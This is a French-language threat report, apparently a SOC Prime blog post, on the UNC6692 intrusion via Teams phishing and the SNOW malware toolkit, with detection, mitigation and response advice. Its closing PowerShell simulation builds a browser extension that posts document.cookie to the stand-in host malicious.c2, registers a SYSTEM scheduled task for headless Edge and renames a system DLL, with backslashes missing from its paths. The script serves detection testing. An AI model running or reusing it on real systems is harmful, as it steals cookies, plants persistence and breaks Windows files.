UNC6692 Déploie des Malwares Personnalisés via l’Ingénierie Sociale

Ruslan Mikhalov Chef de la Recherche sur les Menaces chez SOC Prime

Suivre

UNC6692 Déploie des Malwares Personnalisés via l’Ingénierie Sociale

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

UNC6692 a mené une intrusion en plusieurs étapes débutant par un lien de phishing envoyé via Microsoft Teams, a déployé une charge utile AutoHotKey malveillante, et a implanté une boîte à outils de malware modulaire sur mesure connue sous le nom de SNOW, incluant SNOWBELT, SNOWGLAZE, et SNOWBASIN. L’opération a également utilisé une extension de navigateur Chromium malveillante, une utilité de tunneling écrite en Python, et une porte dérobée HTTP locale pour permettre des mouvements latéraux, le vol de références, et l’exfiltration de données via des services cloud. La campagne s’est distinguée par son abus efficace de l’infrastructure cloud légitime et des mécanismes de persistance basés sur le navigateur. Détecter cette activité nécessite une surveillance étroite des comportements inhabituels d’extensions de navigateur, des tâches planifiées lançant Edge en mode tête d’engin, et des accès suspects aux services de stockage cloud.

Enquête

Le groupe Google Threat Intelligence a découvert la campagne grâce à l’analyse des enregistrements de chat Teams, des scripts AutoHotKey capturés, des configurations de tâches planifiées, et du trafic réseau impliquant AWS S3 et un serveur WebSocket hébergé sur Heroku. L’analyse de malware a mis au jour la famille de logiciels malveillants SNOW, ses composants internes, ses schémas de communication, et l’utilisation par les attaquants de PsExec avec des outils de vidage d’identifiants. Les enquêteurs ont également confirmé le vol de la mémoire LSASS et des fichiers de la base de données Active Directory, exfiltrés par LimeWire.

Atténuation

Les défenseurs devraient appliquer des politiques de liste blanche strictes pour les extensions de navigateur, surveiller les lancements de Microsoft Edge avec des drapeaux en mode tête d’engin ou liés aux extensions, et bloquer l’accès aux compartiments AWS S3 non approuvés et aux domaines Heroku. L’application de l’authentification multi-facteurs pour les comptes privilégiés, la veille sur l’exécution de PsExec et l’accès à LSASS peuvent aider à limiter le vol de références et les mouvements latéraux. Les tâches planifiées et les raccourcis de démarrage devraient également être révisés régulièrement pour identifier une persistance non autorisée.

Réponse

Si un composant SNOW est détecté, isolez immédiatement le système affecté, terminez les processus Edge et AutoHotKey suspects, et rassemblez la mémoire pour l’analyse judiciaire liée à LSASS. Bloquez les domaines et adresses IP de commande et de contrôle connus, supprimez les extensions de navigateur malveillantes, et tournez les identifiants pour les comptes privilégiés. Une analyse complète à l’échelle du réseau doit ensuite être effectuée pour identifier les autres hôtes compromis, avec un examen des tâches planifiées et des éléments de démarrage pour la persistance.

"graph TB %% Définition de classes classDef technique fill:#99ccff classDef outil fill:#cccccc classDef malware fill:#ffcc99 classDef operateur fill:#ff9900 %% Nœuds de technique tech_phishing["Technique – T1566.002 Phishing : Lien de spearphishing via Microsoft Teams Description : L’adversaire délivre un lien malveillant via Microsoft Teams aux utilisateurs ciblés."] class tech_phishing technique tech_user_exec["Technique – T1204.001 Exécution d’utilisateur : Cliquer sur un lien malveillant Description : La victime clique sur le lien malveillant, déclenchant l’exécution."] class tech_user_exec technique tech_ahk["Technique – T1059.010 Interprète de commande et de script : AutoHotkey/AutoIT Description : Exécute un binaire et un script AutoHotkey pour lancer un code supplémentaire."] class tech_ahk technique tech_python["Technique – T1059.006 Interprète de commande et de script : Python Description : Exécute des chargeurs Python pour des modules additionnels."] class tech_python technique tech_ext["Technique – T1176 Extensions logicielles : Installer l’extension Chromium Description : Installe une extension de navigateur malveillante pour maintenir la persistance."] class tech_ext technique tech_schedtask["Technique – T1053.005 Tâche planifiée : Lancer Edge sans interface Description : Crée des tâches planifiées pour démarrer Edge avec l’extension malveillante."] class tech_schedtask technique tech_shortcut["Technique – T1547.009 Modification de raccourci Description : Place un raccourci dans le dossier de démarrage pour une exécution automatique."] class tech_shortcut technique tech_ingress["Technique – T1105 Transfert d’outil d’entrée Description : Télécharge des charges utiles supplémentaires comme SNOWGLAZE et SNOWBASIN."] class tech_ingress technique tech_obfuscate["Technique – T1027 Fichiers ou informations obscurcis Description : Encode des charges utiles avec Base64 et les chiffre avec AESu2011GCM."] class tech_obfuscate technique tech_archive["Technique – T1560 Archivage des données collectées Description : Chiffre et prépare les données avant l’exfiltration."] class tech_archive technique tech_encchannel["Technique – T1573.001 Canal chiffré : Cryptographie symétrique Description : Utilise AESu2011GCM pour les communications chiffrées."] class tech_encchannel technique tech_tunnel["Technique – T1572 Tunneling de protocole Description : Établit un tunnel WebSocket vers un serveur de commande et de contrôle Heroku."] class tech_tunnel technique tech_appproto["Technique – T1071.001 Protocole de couche application : WebSocket Description : Communique avec C2 via le protocole de couche application WebSocket."] class tech_appproto technique tech_proxy["Technique – T1090 Proxy Description : Utilise le tunnel comme proxy pour acheminer le trafic."] class tech_proxy technique tech_psexec["Technique – T1021.002 Partages SMB/Windows Admin : PsExec Description : Exécute des processus à distance via des partages d’administration SMB pour le mouvement latéral."] class tech_psexec technique tech_cred_dump["Technique – T1003 Vidage des identifiants du système d’exploitation Description : Extrait les identifiants de la mémoire LSASS."] class tech_cred_dump technique tech_pass_hash["Technique – T1550.002 Passer le hash Description : Utilise les hash NTLM capturés pour s’authentifier sur d’autres systèmes."] class tech_pass_hash technique tech_rdp["Technique – T1021.001 Protocole de bureau à distance Description : Se connecte via RDP au serveur de sauvegarde et au contrôleur de domaine."] class tech_rdp technique tech_exfil["Technique – T1567.002 Exfiltration vers le stockage en cloud Description : Télécharge les fichiers de la base de données AD collectés vers Amazon S3."] class tech_exfil technique %% Nœuds d’outil tool_ahk_binary["Outil – Nom : Binaire AutoHotkey Description : Exécute des scripts AHK compilés."] class tool_ahk_binary outil tool_python_runtime["Outil – Nom : Interpréteur Python Description : Exécute des chargeurs basés sur Python."] class tool_python_runtime outil tool_edge_headless["Outil – Nom : Microsoft Edge (sans interface) Description : Navigateur utilisé pour exécuter l’extension malveillante."] class tool_edge_headless outil tool_snowglaze["Outil – Nom : Chargeur SNOWGLAZE Description : Télécharge et lance des modules supplémentaires."] class tool_snowglaze outil tool_snowbasin["Outil – Nom : Chargeur SNOWBASIN Description : Chargeur secondaire utilisé après SNOWGLAZE."] class tool_snowbasin outil tool_snowbelt_ext["Outil – Nom : Extension SNOWBELT Chromium Description : Fournit la persistance et la collecte de données dans le navigateur."] class tool_snowbelt_ext outil tool_psexec["Outil – Nom : PsExec Description : Exécute des processus sur des hôtes Windows distants via des partages admin."] class tool_psexec outil %% Nœuds de malware malware_snowglaze["Malware – Nom : SNOWGLAZE Description : Chargeur qui crée un tunnel WebSocket et chiffre le trafic."] class malware_snowglaze malware malware_snowbasin["Malware – Nom : SNOWBASIN Description : Charge utile secondaire qui aide à la mise en scène des données."] class malware_snowbasin malware malware_snowbelt["Malware – Nom : Extension SNOWBELT Description : Extension Chromium utilisée pour la persistance et l’exfiltration."] class malware_snowbelt malware %% Connexions de flux d’attaque tech_phishing –>|mène_à| tech_user_exec tech_user_exec –>|déclenche| tech_ahk tech_ahk –>|utilise| tool_ahk_binary tech_ahk –>|exécute| tech_python tech_python –>|utilise| tool_python_runtime tech_python –>|télécharge| tool_snowglaze tech_python –>|télécharge| tool_snowbasin tool_snowglaze –>|installe| malware_snowglaze tool_snowbasin –>|installe| malware_snowbasin malware_snowglaze –>|crée| tech_ext tech_ext –>|installe| tool_snowbelt_ext tool_snowbelt_ext –>|installe| malware_snowbelt tech_ext –>|active| tech_schedtask tech_schedtask –>|lance| tool_edge_headless tech_ext –>|active| tech_shortcut tech_shortcut –>|ajoute| op_shortcut_startup(("Raccourci de démarrage")) class op_shortcut_startup operateur tech_user_exec –>|télécharge| tech_ingress tech_ingress –>|livre| tech_obfuscate tech_obfuscate –>|prépare| tech_archive tech_archive –>|protège| tech_encchannel tech_encchannel –>|protège| tech_tunnel tech_tunnel –>|utilise| tech_appproto tech_tunnel –>|agit_comme| tech_proxy tech_proxy –>|achemine| tech_psexec tech_psexec –>|utilise| tool_psexec tool_psexec –>|exécute| tech_cred_dump tech_cred_dump –>|fournit| tech_pass_hash tech_pass_hash –>|active| tech_rdp tech_rdp –>|se_connecte_à| tech_exfil "

Flux d’attaque

Narratif de l’attaque et commandes :
1. Objectif : Établir une exécution persistante et furtive de la charge utile basée sur le navigateur Snowbelt sur l’hôte victime.
2. Méthode : Enregistrer une tâche planifiée qui lance Microsoft Edge en mode sans interface avec l’extension Snowbelt malveillante (C:TempSnowbelt). L’extension charge un JavaScript malveillant qui contacte le C2 et exfiltre des données.
3. Indicateur de nettoyage : Après que la charge utile est exécutée, l’attaquant supprime CoreUIComponents.dll du cache DLL système pour éviter la détection d’un processus Edge « sain » ; le processus edge continue de fonctionner mais le module est absent, satisfaisant la seconde condition de la règle.

Script de test de régression :

# Simulation UNC6692 – crée une tâche planifiée malveillante et exécute Edge sans CoreUIComponents.dll
# -------------------------------------------------------------------------
# 1️⃣ Définir les variables
$edgePath   = "$Env:ProgramFiles(x86)MicrosoftEdgeApplicationmsedge.exe"
$extPath    = "C:TempSnowbelt"
$taskName   = "SnowbeltEdgeTask"
$arguments  = "--headless --load-extension=`"$extPath`""
$taskUser   = "SYSTEM"

# 2️⃣ S'assurer que le dossier d'extension existe (charge utile simulée)
New-Item -ItemType Directory -Force -Path $extPath | Out-Null
Set-Content -Path "$extPathmanifest.json" -Value '{"name":"Snowbelt","version":"1.0","manifest_version":2,"background":{"scripts":["snow.js"]}}' -Encoding UTF8
Set-Content -Path "$extPathsnow.js" -Value 'fetch("http://malicious.c2/collect", {method:"POST", body:document.cookie});' -Encoding UTF8

# 3️⃣ Enregistrer la tâche planifiée malveillante
$action  = New-ScheduledTaskAction -Execute $edgePath -Argument $arguments
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -User $taskUser -Force

# 4️⃣ Démarrer la tâche immédiatement pour générer la télémétrie
Start-ScheduledTask -TaskName $taskName

# 5️⃣ Supprimer CoreUIComponents.dll du processus Edge en cours (simulé)
#    Remarque : Dans un environnement réel, cela impliquerait le détournement de DLL ou la modification de la mémoire du processus.
#    Ici nous supprimons simplement le fichier pour que la vérification du tasklist le manque.
$dllPath = "$Env:SystemRootSystem32CoreUIComponents.dll"
if (Test-Path $dllPath) {
    Rename-Item -Path $dllPath -NewName "CoreUIComponents.dll.bak" -Force
}

# 6️⃣ Vérifier que Edge fonctionne et que la DLL est absente
$proc = Get-Process -Name "msedge" -ErrorAction SilentlyContinue
if ($proc) {
    Write-Host "Processus Edge PID $($proc.Id) lancé avec extension malveillante."
}

Commandes de nettoyage :

# Retirer la tâche planifiée
Unregister-ScheduledTask -TaskName "SnowbeltEdgeTask" -Confirm:$false

# Restaurer CoreUIComponents.dll s'il a été renommé
$dllPath = "$Env:SystemRootSystem32CoreUIComponents.dll"
$backup   = "$Env:SystemRootSystem32CoreUIComponents.dll.bak"
if (Test-Path $backup) {
    Rename-Item -Path $backup -NewName "CoreUIComponents.dll" -Force
}

# Supprimer les fichiers d'extension simulée
Remove-Item -Path "C:TempSnowbelt" -Recurse -Force

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement